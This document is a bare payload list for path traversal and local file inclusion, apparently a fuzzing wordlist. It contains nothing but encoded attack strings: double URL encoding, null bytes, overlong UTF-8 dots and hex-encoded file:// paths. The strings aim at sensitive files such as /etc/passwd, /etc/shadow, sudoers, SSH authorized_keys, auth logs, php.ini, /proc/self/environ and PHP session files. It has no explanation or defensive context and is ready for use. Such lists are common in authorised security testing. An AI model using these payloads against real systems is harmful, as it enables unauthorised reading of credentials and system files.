%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.0%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.1%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.2%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.3%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f7.4%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f8.0%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f8.1%252ffpm%252fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f8.2%252ffpm%252fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
../../../../../../../../../etc/passwd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00
%2e%2e%2f%2e%2e%2fetc%2fhosts%00
../../../../../../../../../etc/hosts%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow%00
../../../../../../../../../etc/shadow%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth.log%00
../../../../../../../../../var/log/auth.log%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fssh%2fsshd_config%00
../../../../../../../../../etc/ssh/sshd_config%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2fapache2.conf%00
../../../../../../../../../etc/apache2/apache2.conf%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2fapache2%2fphp.ini%00
../../../../../../../../../etc/php/7.4/apache2/php.ini%00
file///%2e/%2e/%2f/65/74/63/%2f/70/61/73/73/77/64
file///%2e/%2e/%2f/65/74/63/%2f/73/68/61/64/6f/77
file///%2e/%2e/%2f/65/74/63/%2f/67/72/6f/75/70
file///%2e/%2e/%2f/65/74/63/%2f/68/6f/73/74/6e/61/6d/65
file///%2e/%2e/%2f/65/74/63/%2f/68/6f/73/74/73
file///%2e/%2e/%2f/65/74/63/%2f/69/6e/65/74/64/%2e/63/6f/6e/66
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/61/75/74/68/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/73/79/73/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/6d/65/73/73/61/67/65/73
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/64/6d/65/73/67
file///%2e/%2e/%2f/68/6f/6d/65/%2f/75/73/65/72/%2f/%2e/62/61/73/68/72/63
file///%2e/%2e/%2f/68/6f/6d/65/%2f/75/73/65/72/%2f/%2e/70/72/6f/66/69/6c/65
file///%2e/%2e/%2f/65/74/63/%2f/70/72/6f/66/69/6c/65
file///%2e/%2e/%2f/65/74/63/%2f/65/6e/76/69/72/6f/6e/6d/65/6e/74
file///%2e/%2e/%2f/65/74/63/%2f/6d/6f/74/64
file///%2e/%2e/%2f/65/74/63/%2f/72/65/73/6f/6c/76/%2e/63/6f/6e/66
file///%2e/%2e/%2f/65/74/63/%2f/73/65/63/75/72/65/74/74/79
file///%2e/%2e/%2f/65/74/63/%2f/66/73/74/61/62
file///%2e/%2e/%2f/65/74/63/%2f/65/78/70/6f/72/74/73
file///%2e/%2e/%2f/65/74/63/%2f/66/74/70/75/73/65/72/73
file///%2e/%2e/%2f/65/74/63/%2f/69/73/73/75/65
file///%2e/%2e/%2f/65/74/63/%2f/69/73/73/75/65/%2e/6e/65/74
file///%2e/%2e/%2f/65/74/63/%2f/6e/73/73/77/69/74/63/68/%2e/63/6f/6e/66
file///%2e/%2e/%2f/65/74/63/%2f/64/65/66/61/75/6c/74/%2f/6c/6f/67/69/6e
file///%2e/%2e/%2f/65/74/63/%2f/73/75/64/6f/65/72/73
file///%2e/%2e/%2f/65/74/63/%2f/72/63/%2e/6c/6f/63/61/6c
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/%2e/61/6c/6c/6f/77
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/%2e/64/65/6e/79
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/74/61/62
file///%2e/%2e/%2f/65/74/63/%2f/72/63/%2e/64/%2f/69/6e/69/74/%2e/64
file///%2e/%2e/%2f/65/74/63/%2f/73/79/73/63/6f/6e/66/69/67/%2f/6e/65/74/77/6f/72/6b
file///%2e/%2e/%2f/65/74/63/%2f/73/79/73/63/6f/6e/66/69/67/%2f/69/70/74/61/62/6c/65/73
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/78/66/65/72/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/6d/61/69/6c/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/6d/61/69/6c/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/75/73/65/72/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/6c/70/72/%2e/6c/6f/67
file///%2e/%2e/%2f/68/6f/6d/65/%2f/75/73/65/72/%2f/%2e/6e/65/74/72/63
file///%2e/%2e/%2f/68/6f/6d/65/%2f/75/73/65/72/%2f/%2e/73/73/68/%2f/61/75/74/68/6f/72/69/7a/65/64/5f/6b/65/79/73
file///%2e/%2e/%2f/68/6f/6d/65/%2f/75/73/65/72/%2f/%2e/73/73/68/%2f/6b/6e/6f/77/6e/5f/68/6f/73/74/73
file///%2e/%2e/%2f/72/6f/6f/74/%2f/%2e/62/61/73/68/72/63
file///%2e/%2e/%2f/72/6f/6f/74/%2f/%2e/70/72/6f/66/69/6c/65
file///%2e/%2e/%2f/65/74/63/%2f/68/6f/73/74/73/%2e/61/6c/6c/6f/77
file///%2e/%2e/%2f/65/74/63/%2f/68/6f/73/74/73/%2e/64/65/6e/79
file///%2e/%2e/%2f/65/74/63/%2f/6e/65/74/77/6f/72/6b/73
file///%2e/%2e/%2f/65/74/63/%2f/73/65/72/76/69/63/65/73
file///%2e/%2e/%2f/65/74/63/%2f/70/72/6f/74/6f/63/6f/6c/73
file///%2e/%2e/%2f/70/72/6f/63/%2f/6d/6f/75/6e/74/73
file///%2e/%2e/%2f/70/72/6f/63/%2f/6e/65/74/%2f/74/63/70
file///%2e/%2e/%2f/70/72/6f/63/%2f/6e/65/74/%2f/75/64/70
file///%2e/%2e/%2f/70/72/6f/63/%2f/76/65/72/73/69/6f/6e
file///%2e/%2e/%2f/70/72/6f/63/%2f/73/65/6c/66/%2f/65/6e/76/69/72/6f/6e
file///%2e/%2e/%2f/70/72/6f/63/%2f/6d/65/6d/69/6e/66/6f
file///%2e/%2e/%2f/70/72/6f/63/%2f/63/70/75/69/6e/66/6f
file///%2e/%2e/%2f/70/72/6f/63/%2f/63/6d/64/6c/69/6e/65
file///%2e/%2e/%2f/70/72/6f/63/%2f/63/6f/6e/66/69/67/%2e/67/7a
file///%2e/%2e/%2f/70/72/6f/63/%2f/73/74/61/74
file///%2e/%2e/%2f/73/79/73/%2f/6b/65/72/6e/65/6c/%2f/64/65/62/75/67
file///%2e/%2e/%2f/73/79/73/%2f/63/6c/61/73/73/%2f/6e/65/74
file///%2e/%2e/%2f/73/79/73/%2f/64/65/76/69/63/65/73
file///%2e/%2e/%2f/76/61/72/%2f/72/75/6e/%2f/75/74/6d/70
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/77/74/6d/70
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/62/74/6d/70
file///%2e/%2e/%2f/65/74/63/%2f/6c/64/%2e/73/6f/%2e/63/61/63/68/65
file///%2e/%2e/%2f/65/74/63/%2f/6c/64/%2e/73/6f/%2e/63/6f/6e/66
file///%2e/%2e/%2f/65/74/63/%2f/6c/6f/63/61/6c/74/69/6d/65
file///%2e/%2e/%2f/65/74/63/%2f/67/73/68/61/64/6f/77
file///%2e/%2e/%2f/65/74/63/%2f/73/68/61/64/6f/77/2d
file///%2e/%2e/%2f/76/61/72/%2f/6d/61/69/6c/%2f/72/6f/6f/74
file///%2e/%2e/%2f/76/61/72/%2f/6d/61/69/6c/%2f/75/73/65/72
file///%2e/%2e/%2f/76/61/72/%2f/73/70/6f/6f/6c/%2f/6d/61/69/6c/%2f/72/6f/6f/74
file///%2e/%2e/%2f/76/61/72/%2f/73/70/6f/6f/6c/%2f/6d/61/69/6c/%2f/75/73/65/72
file///%2e/%2e/%2f/76/61/72/%2f/6c/69/62/%2f/64/68/63/70/%2f/64/68/63/6c/69/65/6e/74/%2e/6c/65/61/73/65/73
file///%2e/%2e/%2f/65/74/63/%2f/61/6c/69/61/73/65/73
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/73/65/63/75/72/65
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/66/61/69/6c/6c/6f/67
file///%2e/%2e/%2f/65/74/63/%2f/64/65/66/61/75/6c/74/%2f/75/73/65/72/61/64/64
file///%2e/%2e/%2f/65/74/63/%2f/64/65/66/61/75/6c/74/%2f/63/6f/6e/73/6f/6c/65
file///%2e/%2e/%2f/65/74/63/%2f/73/79/73/63/74/6c/%2e/63/6f/6e/66
file///%2e/%2e/%2f/65/74/63/%2f/69/73/73/75/65
file///%2e/%2e/%2f/76/61/72/%2f/61/64/6d/%2f/73/75/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/6c/61/73/74/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/74/61/6c/6c/79/6c/6f/67
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/%2e/64/61/69/6c/79
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/%2e/77/65/65/6b/6c/79
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/%2e/68/6f/75/72/6c/79
file///%2e/%2e/%2f/65/74/63/%2f/63/72/6f/6e/%2e/6d/6f/6e/74/68/6c/79
file///%2e/%2e/%2f/65/74/63/%2f/63/73/68/%2e/6c/6f/67/69/6e
file///%2e/%2e/%2f/65/74/63/%2f/63/73/68/%2e/63/73/68/72/63
file///%2e/%2e/%2f/65/74/63/%2f/7a/73/68/72/63
file///%2e/%2e/%2f/65/74/63/%2f/62/61/73/68/72/63
file///%2e/%2e/%2f/65/74/63/%2f/69/6e/70/75/74/72/63
file///%2e/%2e/%2f/65/74/63/%2f/6c/6f/67/69/6e/%2e/64/65/66/73
file///%2e/%2e/%2f/65/74/63/%2f/73/68/65/6c/6c/73
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/79/75/6d/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/61/70/74/%2f/68/69/73/74/6f/72/79/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/61/70/74/%2f/74/65/72/6d/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/70/61/63/6d/61/6e/%2e/6c/6f/67
file///%2e/%2e/%2f/76/61/72/%2f/6c/6f/67/%2f/69/6e/73/74/61/6c/6c/65/72/%2f/73/79/73/6c/6f/67
file///%2e/%2e/%2f/62/6f/6f/74/%2f/67/72/75/62/%2f/67/72/75/62/%2e/63/66/67
../../../../../../../../../var/lib/php/sessions/sess_
../../../../../../../var/lib/php/sessions/sess_
../../../../../../var/lib/php/sessions/sess_
../../../../../var/lib/php/sessions/sess_
../../../../var/lib/php/sessions/sess_
../../../var/lib/php/sessions/sess_
../../var/lib/php/sessions/sess_
../var/lib/php/sessions/sess_
..%2f..%2f..%2f..%2f..%2f..%2fvar%2flib%2fphp%2fsessions%2fsess_
..%252f..%252f..%252f..%252fvar%252flib%252fphp%252fsessions%252fsess_
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flib%2fphp%2fsessions%2fsess_
..%2e%2e%2f..%2e%2e%2f..%2e%2e%2fvar%2flib%2fphp%2fsessions%2fsess_
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fvar%2flib%2fphp%2fsessions%2fsess_
..%252f..%252f..%252fvar%252flib%252fphp%252fsessions%252fsess_